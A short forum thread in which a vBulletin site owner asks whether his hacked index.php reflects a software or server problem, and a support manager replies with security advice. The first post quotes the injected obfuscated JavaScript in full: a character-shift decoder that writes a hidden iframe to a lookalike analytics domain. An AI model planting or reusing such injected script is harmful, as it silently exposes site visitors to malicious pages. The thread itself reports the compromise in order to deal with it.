Index.php hacked?

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • ianmac
    Member
    • Sep 2005
    • 39
    • 3.0.8

    Index.php hacked?

    My index.php was hacked, similar to


    The first line of of index.php was changed to

    <script>var source ="=jgsbnf!tsd>#iuuq;00hpphmf.bobmjufdt/dpn0jo/dhj@3#!xjeui>2!ifjhiu>2!tuzmf>#wjtjcjmjuz;!ijeefo#?=0jgsbnf?"; var result = "";
    for(var i=0;i<source.length;i++) result+=String.fromCharCode(source.charCodeAt(i)-1);
    document.write(result); </script><?php

    Is this a VB or site problem?
  • Steve Machol
    Former Customer Support Manager
    • Jul 2000
    • 154488

    #2
    If someone hacked the index.php files then they had to do this through the server.

    Please see this thread on how to make your vBulletin more secure:



    If you are still being hacked after doing all of this, then they are most likely doing this by accessing your server. You need to contact your host about this.
    Steve Machol, former vBulletin Customer Support Manager (and NOT retired!)
    Change CKEditor Colors to Match Style (for 4.1.4 and above)

    Steve Machol Photography


    Mankind is the only creature smart enough to know its own history, and dumb enough to ignore it.


    Comment

    • ianmac
      Member
      • Sep 2005
      • 39
      • 3.0.8

      #3
      Thanks Steve, the irony was the script put in the index.php did not work (just got error message line 1...etc) and got me onto the problem quickly. The same hacks were in index.htm and index.html elsewhere on the site and executed OK but my mcafee blocked it. Hopefully my users were not affected by them too.
      I have changed my password onto the site so I am hoping that is that.

      Comment

      widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
      Working...